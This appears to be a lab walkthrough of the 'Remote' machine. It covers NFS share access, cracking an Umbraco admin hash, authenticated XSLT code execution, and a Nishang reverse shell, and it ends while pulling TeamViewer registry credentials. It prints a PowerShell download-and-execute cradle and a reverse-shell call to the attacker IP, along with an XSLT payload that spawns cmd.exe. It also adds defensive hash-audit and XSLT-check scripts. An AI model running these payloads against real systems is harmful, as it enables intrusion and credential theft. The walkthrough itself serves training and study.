Remote

1. Recon

1.1. nmap

The nmap scan shows a service listening on port 80, so web reconnaissance is the next step.

┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# nmap -sC -sV 10.129.230.172 --max-retries 1 --min-rate 5000 -p- 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-05 08:52 +04
Warning: 10.129.230.172 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.129.230.172
Host is up (0.20s latency).
Not shown: 65503 closed tcp ports (reset)
PORT      STATE    SERVICE       VERSION
21/tcp    open     ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open     rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
532/tcp   filtered netnews
1130/tcp  filtered casp
2049/tcp  open     nlockmgr      1-4 (RPC #100021)
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7695/tcp  filtered unknown
8776/tcp  filtered unknown
9167/tcp  filtered unknown
9407/tcp  filtered unknown
16418/tcp filtered unknown
22202/tcp filtered unknown
25295/tcp filtered unknown
37535/tcp filtered unknown
40227/tcp filtered unknown
43280/tcp filtered unknown
45921/tcp filtered unknown
47001/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47883/tcp filtered unknown
49664/tcp open     msrpc         Microsoft Windows RPC
49665/tcp open     msrpc         Microsoft Windows RPC
49666/tcp open     msrpc         Microsoft Windows RPC
49667/tcp open     msrpc         Microsoft Windows RPC
49678/tcp open     msrpc         Microsoft Windows RPC
49679/tcp open     msrpc         Microsoft Windows RPC
49680/tcp open     msrpc         Microsoft Windows RPC
52125/tcp filtered unknown
58346/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-01-05T05:53:46
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: 1h00m04s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.46 seconds

1.2. Web reconnaissance

Browsing the web site itself reveals nothing special.

1.3. Web directory listing

Use ffuf to enumerate directories. Among the results, the install folder stands out.

┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# ffuf -u http://10.129.230.172/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200          

         /___\  /___\            /___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.230.172/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

products                [Status: 200, Size: 5328, Words: 1307, Lines: 130, Duration: 212ms]
contact                 [Status: 200, Size: 7880, Words: 828, Lines: 125, Duration: 268ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 281ms]
# Copyright 2007 James Fisher [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 286ms]
# This work is licensed under the Creative Commons  [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 291ms]
#                       [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 291ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/  [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 297ms]
#                       [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 302ms]
#                       [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 302ms]
# or send a letter to Creative Commons, 171 Second Street,  [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 448ms]
# Priority ordered case insensative list, where entries were found  [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 463ms]
# on atleast 2 different hosts [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 468ms]
# directory-list-lowercase-2.3-medium.txt [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 475ms]
# Attribution-Share Alike 3.0 License. To view a copy of this  [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 479ms]
                        [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 479ms]
#                       [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 557ms]
home                    [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 581ms]
product                 [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 1516ms]
blog                    [Status: 200, Size: 5001, Words: 1249, Lines: 138, Duration: 2185ms]
install                 [Status: 302, Size: 126, Words: 6, Lines: 4, Duration: 408ms]

[...SNIP...]

Browsing to the install folder automatically redirects to a path named umbraco, from which we can infer that the site is built on the Umbraco web framework.

1.4. Searching for umbraco with searchsploit - failed

The search shows that a Metasploit module for an RCE vulnerability exists.

┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# searchsploit umbraco    
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                             |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit)                                                                                                        | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution                                                                                                 | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)                                                                                                 | aspx/webapps/49488.py
Umbraco CMS 8.9.1 - Directory Traversal                                                                                                                    | aspx/webapps/50241.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting                                                                                                 | php/webapps/44988.txt
Umbraco v8.14.1 - 'baseUrl' SSRF                                                                                                                           | aspx/webapps/50462.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

But the attempt fails.

┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# msfconsole -q                                                                              
msf6 > search umbraco

Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/windows/http/umbraco_upload_aspx  2012-06-28       excellent  No     Umbraco CMS Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/umbraco_upload_aspx

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/umbraco_upload_aspx) > show options

Module options (exploit/windows/http/umbraco_upload_aspx):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /umbraco/        yes       The URI path of the Umbraco login page
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.96.133    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Umbraco CMS 4.7.0.378 / Microsoft Windows 7 Professional 32-bit SP1



View the full module info with the info, or info -d command.

There is no response at all.

msf6 exploit(windows/http/umbraco_upload_aspx) > set rhosts 10.129.230.172
rhosts => 10.129.230.172
msf6 exploit(windows/http/umbraco_upload_aspx) > set lhost tun0
lhost => 10.10.14.143
msf6 exploit(windows/http/umbraco_upload_aspx) > run
[*] Started reverse TCP handler on 10.10.14.143:4444 
[*] Uploading 373660 bytes through /umbraco/webservices/codeEditorSave.asmx...
[*] Uploading to /umbraco/mQUXpq.aspx
[*] Didn''t get the expected 500 error code /umbraco/webservices/codeEditorSave.asmx [500 OK]. Trying to execute the payload anyway
[*] Executing /umbraco/mQUXpq.aspx...
[-] Execution failed on /umbraco/mQUXpq.aspx [404 Not Found]
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/umbraco_upload_aspx) > 

1.5. Using showmount

Querying with showmount shows that a shared folder named site_backups is exported.

┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# showmount -e 10.129.230.172
Export list for 10.129.230.172:
/site_backups (everyone)

Mount the share and look inside.

┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# mount -t nfs 10.129.230.172:/site_backups /mnt/

┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# cd /mnt                    

┌──(root㉿kali)-[/mnt]
└─# ls
App_Browsers  App_Data  App_Plugins  aspnet_client  bin  Config  css  default.aspx  Global.asax  Media  scripts  Umbraco  Umbraco_Client  Views  Web.config

Inspecting the Umbraco.sdf file in the App_Data directory shows that the admin account has a hash value labelled SHA1.

┌──(root㉿kali)-[/mnt/App_Data]
└─# strings Umbraco.sdf | head

Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
@{pv
qpkaj

Cracking that hash with hashcat yields the plaintext password baconandcheese.

┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# echo 'b8be16afba8c314ad33d812f22a04991b90e2aaa' > hash 
                                                                                                                                                                                             
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# hashcat -m 100 hash /usr/share/wordlists/rockyou.txt             
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

[...SNIP...]

b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese   

[...SNIP...]
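
As an added example (not from the writeup or from Umbraco) of what the dump above tells a defender: the admin record stores a bare, unsalted SHA1 digest while the smith accounts use salted HMACSHA256, which is why only the admin hash falls to a plain wordlist. The script parses records of the form shown, confirms the cracked value against the SHA1 digest, and flags every account still on the legacy format; the record lines are constructed from the ones above.

```python
import base64
import hashlib
import hmac
import re

# Constructed sample: three account records as they appear in a `strings`
# dump of Umbraco.sdf. Fields are concatenated with no delimiter, so the
# {"hashAlgorithm":...} JSON marker is the only reliable anchor. The admin
# record carries a bare 40-hex SHA1 digest and no salt; the HMACSHA256 records
# carry a base64 salt (16 bytes -> 24 chars, always ending "==") followed by
# a base64 digest (32 bytes -> 44 chars, always ending "=").
SAMPLE_DUMP = """\
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
"""

# The e-mail that follows the marker is terminated by the "en-US" culture field.
EMAIL_AFTER_MARKER = r'(?P<email>[\w.-]+@[\w.-]+?)en-US'
SHA1_RE = re.compile(
    r'(?P<digest>[0-9a-f]{40})\{"hashAlgorithm":"SHA1"\}' + EMAIL_AFTER_MARKER)
HMAC_RE = re.compile(
    r'(?P<salt>[A-Za-z0-9+/]{22}==)(?P<digest>[A-Za-z0-9+/]{43}=)'
    r'\{"hashAlgorithm":"HMACSHA256"\}' + EMAIL_AFTER_MARKER)


def parse_membership_records(dump):
    """Pull (email, algorithm, salt, digest) out of every record line."""
    records = []
    for line in dump.splitlines():
        m = SHA1_RE.search(line)
        if m:
            records.append({"email": m["email"], "algorithm": "SHA1",
                            "salt": None, "digest": m["digest"]})
            continue
        m = HMAC_RE.search(line)
        if m:
            records.append({"email": m["email"], "algorithm": "HMACSHA256",
                            "salt": m["salt"], "digest": m["digest"]})
    return records


def verify_legacy_sha1(digest_hex, candidate):
    """Legacy Umbraco SHA1 is hex(SHA1(password)): unsalted and single-round,
    so a wordlist maps straight onto it (this is what hashcat -m 100 does)."""
    computed = hashlib.sha1(candidate.encode("utf-8")).hexdigest()
    return hmac.compare_digest(computed, digest_hex)


def audit_password_storage(records):
    """One finding per account whose stored hash is wordlist-crackable offline
    (unsalted SHA1) or whose salt is not the expected 16 bytes. Salted HMACSHA256
    is still a fast hash; a slow KDF would be the modern choice, but it at least
    forces per-account work instead of one pass over a shared wordlist."""
    findings = []
    for r in records:
        if r["algorithm"] == "SHA1":
            findings.append(f'{r["email"]}: unsalted legacy SHA1 hash, '
                            f'rehash on next login and force a password reset')
        elif len(base64.b64decode(r["salt"])) != 16:
            findings.append(f'{r["email"]}: unexpected salt length')
    return findings


if __name__ == "__main__":
    recs = parse_membership_records(SAMPLE_DUMP)
    for r in recs:
        print(r["email"], r["algorithm"], "salted" if r["salt"] else "UNSALTED")
    for finding in audit_password_storage(recs):
        print("[!]", finding)
```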

Logging in to the web service under the umbraco path with the username admin@htb.local and the password obtained above produced the result below, but there was little information to be gained from that page.

2. Internal network penetration

2.1. Using searchsploit (2)

Earlier, the attempt via searchsploit and msfconsole failed. The reason is that without account credentials the other vulnerabilities could not be used; now that the admin account's credentials are known, they can be. Looking at 46153.py, once the credentials are entered, RCE is achieved when the payload is sent.

In our case, the test was to send a ping back to my Kali machine via string cmd = "/c ping 10.10.14.143"; System.Diagnostics.Process proc = new System.Diagnostics.Process();.

┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# cat 46153.py  
# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A

[...SNIP...]

# Execute a calc for the PoC
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "/c ping 10.10.14.143"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';

login = "admin@htb.local";
password="baconandcheese";
host = "http://10.129.230.172";

[...SNIP...]
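
The payload in 46153.py works only because the server lets the XSLT engine compile the embedded msxsl:script block (in .NET that requires XsltSettings with script enabled; loading stylesheets with XsltSettings.Default disables it). As an added defender-side example that is not part of the exploit or of Umbraco, the check below rejects a stylesheet that embeds a script block or calls an extension function through a prefix bound to a non-XSLT namespace; both sample stylesheets are constructed, the unsafe one mirroring the payload's structure with a harmless body.

```python
import io
import re
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
MSXSL_NS = "urn:schemas-microsoft-com:xslt"

# Constructed sample with the same shape as the 46153.py payload above, but with
# the C# body replaced by a harmless literal: an msxsl:script block declares an
# extension function that an xsl:value-of then calls.
UNSAFE_XSLT = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
  <msxsl:script language="C#" implements-prefix="csharp_user">
    public string xml() { return "hello"; }
  </msxsl:script>
  <xsl:template match="/"><xsl:value-of select="csharp_user:xml()"/></xsl:template>
</xsl:stylesheet>"""

# Constructed sample of an ordinary stylesheet that only reads the input document.
SAFE_XSLT = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/"><xsl:value-of select="/root/title"/></xsl:template>
</xsl:stylesheet>"""

# An XPath function call through a namespace prefix, e.g. csharp_user:xml(
PREFIXED_CALL = re.compile(
    r"\b(?P<prefix>[A-Za-z_][\w.-]*):(?P<name>[A-Za-z_][\w.-]*)\s*\(")


def declared_namespaces(xslt_text):
    """Map every xmlns prefix declared in the stylesheet to its URI."""
    ns = {}
    source = io.BytesIO(xslt_text.encode("utf-8"))
    for _event, (prefix, uri) in ET.iterparse(source, events=("start-ns",)):
        ns[prefix] = uri
    return ns


def find_script_blocks(root):
    """Return (language, implements-prefix) for every msxsl:script element."""
    return [(el.get("language", ""), el.get("implements-prefix", ""))
            for el in root.iter(f"{{{MSXSL_NS}}}script")]


def check_xslt(xslt_text):
    """Return (accepted, reasons). A stylesheet is rejected if it embeds script
    or calls a function through a prefix bound to anything but the XSLT namespace;
    plain XPath such as /root/title or count(...) carries no prefix and passes."""
    reasons = []
    root = ET.fromstring(xslt_text)
    for language, prefix in find_script_blocks(root):
        reasons.append(f"msxsl:script block (language={language!r}, prefix={prefix!r})")
    ns = declared_namespaces(xslt_text)
    for el in root.iter():
        for attr in ("select", "test", "match"):
            for m in PREFIXED_CALL.finditer(el.get(attr, "")):
                uri = ns.get(m["prefix"])
                if uri != XSL_NS:
                    reasons.append(f"extension function {m['prefix']}:{m['name']}() "
                                   f"bound to namespace {uri}")
    return (not reasons, reasons)


if __name__ == "__main__":
    for label, doc in (("unsafe", UNSAFE_XSLT), ("safe", SAFE_XSLT)):
        accepted, why = check_xslt(doc)
        print(label, "accepted" if accepted else "rejected", why)
```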

Listening for ICMP with tcpdump confirmed that the ping test actually works, which shows that the RCE succeeds.

┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
10:04:40.706589 IP 10.129.230.172 > 10.10.14.143: ICMP echo request, id 1, seq 1, length 40
10:04:40.706692 IP 10.10.14.143 > 10.129.230.172: ICMP echo reply, id 1, seq 1, length 40
10:04:41.711182 IP 10.129.230.172 > 10.10.14.143: ICMP echo request, id 1, seq 2, length 40
10:04:41.711215 IP 10.10.14.143 > 10.129.230.172: ICMP echo reply, id 1, seq 2, length 40
10:04:42.725302 IP 10.129.230.172 > 10.10.14.143: ICMP echo request, id 1, seq 3, length 40
10:04:42.725314 IP 10.10.14.143 > 10.129.230.172: ICMP echo reply, id 1, seq 3, length 40
10:04:43.741190 IP 10.129.230.172 > 10.10.14.143: ICMP echo request, id 1, seq 4, length 40
10:04:43.741211 IP 10.10.14.143 > 10.129.230.172: ICMP echo reply, id 1, seq 4, length 40

2.2. Establishing a reverse shell

To establish a reverse shell, Nishang's shell will be used. Set the cmd variable to the command below, which downloads the PowerShell script.

https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

string cmd = "/c powershell -c iex(new-object net.webclient).downloadstring(\'http://10.10.14.143/shell.ps1\')";

shell.ps1 also has to be modified: append a line at the very end of the file that invokes the reverse shell.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.143 -Port 443

┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# cat shell.ps1 
function Invoke-PowerShellTcp 
{ 

[...SNIP...]

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.143 -Port 443
                                                                                                                                                                                                                                            
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# 

With a listener on port 443, the reverse shell connects.

┌──(root㉿kali)-[/home/kali]
└─# rlwrap -cAr nc -lnvp 443                                       

listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.230.172] 49705
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> cd C:\Users
PS C:\Users> dir


    Directory: C:\Users


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/19/2020   3:12 PM                .NET v2.0                                                             
d-----        2/19/2020   3:12 PM                .NET v2.0 Classic                                                     
d-----        2/19/2020   3:12 PM                .NET v4.5                                                             
d-----        2/19/2020   3:12 PM                .NET v4.5 Classic                                                     
d-----         7/9/2021   6:50 AM                Administrator                                                         
d-----        2/19/2020   3:12 PM                Classic .NET AppPool                                                  
d-r---         1/9/2024   9:48 AM                Public                                                                


PS C:\Users> cd public
PS C:\Users\public> dir


    Directory: C:\Users\public


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-r---         1/9/2024   9:48 AM                Desktop                                                               
d-r---        2/19/2020   3:03 PM                Documents                                                             
d-r---        9/15/2018   3:19 AM                Downloads                                                             
d-r---        9/15/2018   3:19 AM                Music                                                                 
d-r---        9/15/2018   3:19 AM                Pictures                                                              
d-r---        9/15/2018   3:19 AM                Videos                                                                


PS C:\Users\public> cd Desktop
PS C:\Users\public\Desktop> type user.txt

3. Privilege escalation

3.1. Checking privileges

Checking privileges turned up nothing special.

PS C:\Users\public\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\Users\public\Desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
                                     Unknown SID type S-1-5-82-0   Mandatory group, Enabled by default, Enabled group

3.2. tasklist

Looking at the running processes, TeamViewer_Service.exe stands out.

PS C:\Users\public\Desktop> tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0          8 K
System                           4                            0        140 K
Registry                        88                            0     20,440 K
smss.exe                       292                            0      1,236 K
[...SNIP...]
vmtoolsd.exe                  2244                            0     17,800 K
MsMpEng.exe                   2292                            0    111,368 K
TeamViewer_Service.exe        2352                            0     19,220 K
svchost.exe                   2388                            0     12,340 K
nfssvc.exe                    2472                            0      5,308 K
[...SNIP...]

3.3. Looking for a TeamViewer vulnerability

Navigating to the program's directory shows that TeamViewer version 7 is installed. Being an old version, it is likely to have a vulnerability.

PS C:\> cd "Program Files (x86)"
PS C:\Program Files (x86)> dir


    Directory: C:\Program Files (x86)


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        9/15/2018   3:28 AM                Common Files                                                          
d-----        9/15/2018   5:06 AM                Internet Explorer                                                     
d-----        2/23/2020   2:19 PM                Microsoft SQL Server                                                  
d-----        2/23/2020   2:15 PM                Microsoft.NET                                                         
d-----        2/19/2020   3:11 PM                MSBuild                                                               
d-----        2/19/2020   3:11 PM                Reference Assemblies                                                  
d-----        2/20/2020   2:14 AM                TeamViewer                                                            
d-----        9/15/2018   5:05 AM                Windows Defender                                                      
d-----        9/15/2018   3:19 AM                Windows Mail                                                          
d-----       10/29/2018   6:39 PM                Windows Media Player                                                  
d-----        9/15/2018   3:19 AM                Windows Multimedia Platform                                           
d-----        9/15/2018   3:28 AM                windows nt                                                            
d-----       10/29/2018   6:39 PM                Windows Photo Viewer                                                  
d-----        9/15/2018   3:19 AM                Windows Portable Devices                                              
d-----        9/15/2018   3:19 AM                WindowsPowerShell                                                     

PS C:\Program Files (x86)> cd TeamViewer
PS C:\Program Files (x86)\TeamViewer> dir


    Directory: C:\Program Files (x86)\TeamViewer


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/27/2020  10:35 AM                Version7                                                              

3.4. Extracting the password from the registry

Running get-itemproperty on that program's key shows, in the PSPath field, that the registry key lives at HKEY_LOCAL_MACHINE\software\wow6432node\teamviewer\version7.

PS HKLM:\software\wow6432node\teamviewer\version7> get-itemproperty -path .


StartMenuGroup            : TeamViewer 7
InstallationDate          : 2020-02-20
InstallationDirectory     : C:\Program Files (x86)\TeamViewer\Version7
Always_Online             : 1
Security_ActivateDirectIn : 0
Version                   : 7.0.43148
ClientIC                  : 301094961
PK                        : {191, 173, 42, 237...}
SK                        : {248, 35, 152, 56...}
LastMACUsed               : {, 005056B07D8F}
MIDInitiativeGUID         : {514ed376-a4ee-4507-a28b-484604ed0ba0}
MIDVersion                : 1
ClientID                  : 1769137322
CUse                      : 1
LastUpdateCheck           : 1704810710
UsageEnvironmentBackup    : 1
SecurityPasswordAES       : {255, 155, 28, 115...}
MultiPwdMgmtIDs           : {admin}
MultiPwdMgmtPWDs          : {357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77}
Security_PasswordStrength : 3
PSPath                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\wow6432node\teamviewer\vers
                            ion7
